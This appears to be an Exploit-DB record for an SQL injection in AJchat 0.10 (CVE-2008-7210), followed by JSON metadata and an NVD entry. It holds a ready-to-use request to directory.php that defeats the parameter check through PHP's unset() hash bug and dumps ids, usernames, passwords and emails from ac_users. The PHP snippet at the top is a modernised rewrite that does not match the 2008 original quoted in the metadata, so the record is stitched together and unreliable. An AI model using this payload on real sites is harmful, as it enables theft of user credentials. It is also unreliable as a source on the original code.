ID EDB-ID:4890
Type exploitdb
Reporter Eugene Minaev
Modified 2008-01-11T00:00:00
Description
AJchat 0.10 unset() bug Remote SQL Injection Vulnerability (CVE-2008-7210). Web application exploit for the PHP platform; the root cause is a PHP engine unset() bug (CVE-2006-3017) rather than the application's input whitelist.
----[ AJchat Remote Sql Injection using unset() bug ... ITDefence.ru Antichat.ru ]
AJchat Remote Sql Injection using unset() bug
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
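<?php
/**
 * Normalise the optional "s" request parameter (a single directory letter).
 *
 * @param mixed $value Raw value taken from $_GET.
 * @return string|null The upper-cased letter when $value is exactly one
 *                     ASCII character in A..Z (case-insensitive), else null.
 */
function ajchat_normalize_s($value)
{
    // ?s[]=x arrives as an array: strtoupper() only warns and yields null on
    // PHP 7 but throws a TypeError on PHP 8, so reject non-strings up front.
    if (!is_string($value)) {
        return null;
    }
    $upper = strtoupper($value);
    // \A..\z (not ^..$) so a trailing newline cannot sneak past the check;
    // this matches the original strlen()==1 && 'A'..'Z' contract exactly.
    return preg_match('/\A[A-Z]\z/', $upper) === 1 ? $upper : null;
}

if (isset($_GET['s'])) {
    $normalized = ajchat_normalize_s($_GET['s']);
    if ($normalized === null) {
        // NOTE(review): the whitelist above is sound; the bypass in this
        // advisory abuses the PHP engine's unset() hash-deletion bug
        // (CVE-2006-3017), not the validation. Downstream code should use a
        // validated local copy instead of trusting that $_GET['s'] is gone.
        // unset() is kept here only to preserve the original contract.
        unset($_GET['s']);
    } else {
        $_GET['s'] = $normalized;
    }
}
?>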
As we can see, $_GET['s'] may hold only a single A..Z character; anything else makes the script unset() it. The whitelist itself is sound — the bypass below relies on PHP's unset() hash-deletion bug (CVE-2006-3017): per the CVE description, the extra numeric parameters are chosen to match the hash of the key "s", so unset($_GET['s']) silently fails and the unvalidated value reaches the SQL query in directory.php.
calc.exe s
5861526=1
5863704=1
directory.php?s='and 1 = 2 union select concat_ws(char(59),id,username,password,email),null+from+ac_users/*&5861526=1&5863704=1
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# milw0rm.com [2008-01-11]
{"bulletinFamily": "exploit", "id": "EDB-ID:4890", "cvelist": ["CVE-2008-7210"], "modified": "2008-01-11T00:00:00", "lastseen": "2016-01-31T21:01:05", "edition": 1, "sourceData": "----[ AJchat Remote Sql Injection using unset() bug ... ITDefence.ru Antichat.ru ]\n\n\t\t\t\t\t\t\tAJchat Remote Sql Injection using unset() bug\n\t\t\t\t\t\t\tEugene Minaev underwater@itdefence.ru \n\t\t\t\t___________________________________________________________________\n\t\t\t____/ __ __ _______________________ _______ _______________ \\ \\ \\\n\t\t\t/ .\\ / /_// // / \\ \\/ __ \\ /__/ /\n\t\t\t/ / /_// /\\ / / / / /___/\n\t\t\t\\/ / / / / /\\ / / /\n\t\t\t/ / \\/ / / / / /__ //\\\n\t\t\t\\ / ____________/ / \\/ __________// /__ // / \n\t\t\t/\\\\ \\_______/ \\________________/____/ 2007 /_//_/ // //\\\n\t\t\t\\ \\\\ // // /\n\t\t\t.\\ \\\\ -[ ITDEFENCE.ru Security advisory ]- // // / . \n\t\t\t. \\_\\\\________[________________________________________]_________//_//_/ . .\n\t\t\t\n\t\t<?php\n\t\tif (isset($_GET[\"s\"])){\n\t\t$_GET[\"s\"] = strtoupper($_GET[\"s\"]);\n\t\tif (strlen($_GET[\"s\"])==1 && $_GET[\"s\"]>='A' && $_GET[\"s\"]<='Z'){\n\t\t// nothing\n\t\t}else unset($_GET['s']);\n\t\t} \n\t\t?>\n\t\t\n\t\tAs we can see , $_GET['s'] can include only A..Z characters , in other way script unset() it.\n\t\t\n\t\tcalc.exe s\n\t\t5861526=1\n\t\t5863704=1\n\t\t\n\t\tdirectory.php?s='and 1 = 2 union select concat_ws(char(59),id,username,password,email),null+from+ac_users/*&5861526=1&5863704=1\n\n----[ FROM RUSSIA WITH LOVE :: underWHAT?! 
, gemaglabin ]\n\n# milw0rm.com [2008-01-11]\n", "published": "2008-01-11T00:00:00", "href": "https://www.exploit-db.com/exploits/4890/", "osvdbidlist": ["58130"], "reporter": "Eugene Minaev", "hash": "efb7dbbdd00b53169b292011d0ef56f0d2519f4a542bf0dceaa8505f6eeef009", "title": "AJchat 0.10 unset bug Remote SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "AJchat 0.10 unset() bug Remote SQL Injection Vulnerability. CVE-2008-7210. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4890/", "viewCount": 1, "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2008-7210", "type": "cve", "title": "CVE-2008-7210", "description": "directory.php in AJchat 0.10 allows remote attackers to bypass input validation and conduct SQL injection attacks via a numeric parameter with a value matching the s parameter's hash value, which prevents the associated $_GET[\"s\"] variable from being unset. NOTE: it could be argued that this vulnerability is due to a bug in the unset PHP command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this should not be treated as a vulnerability in AJChat.", "published": "2009-09-11T12:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7210", "cvelist": ["CVE-2008-7210"], "lastseen": "2017-09-29T14:26:25"}]}}